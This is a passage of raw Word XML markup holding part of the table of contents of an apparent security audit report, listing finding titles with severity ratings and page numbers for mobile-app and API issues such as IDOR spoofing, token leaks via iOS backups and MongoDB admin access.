            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Credential</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>missing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Protection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250039">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-040</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>PII</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>iOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Backups</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250038">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-043</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1/2:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Arbitrary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Broadcast</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Message</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Spoofing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>IDOR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250037">
            <w:r>
              <w:rPr/>
              <w:t>Hardening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250036">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>TLS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Hardening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250035">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-16"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Multiple</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Inherited</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Dependencies</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250034">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>MongoDB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Multiple</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Leaks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250033">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Possible</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>takeover</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>localStorage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Usage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250032">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-006</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-17"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-15"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Authentication</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-15"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>remains</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-15"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Valid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-15"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>after</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-15"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Logout</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250031">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-008</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Multiple</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Leaks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Error</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Messages</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250030">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-009</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>User</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Enumeration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Responses</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250029">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-010</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP3/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Usage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Insecure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Crypto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Functions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>PRNG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Low)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250028">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-011</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Support</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Insecure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>v1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Signature</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Android</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Info)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250027">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-013</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Android</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Binary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Hardening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Info)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9109" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250026">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-019</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP1/5:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Missing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Jailbreak/Root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
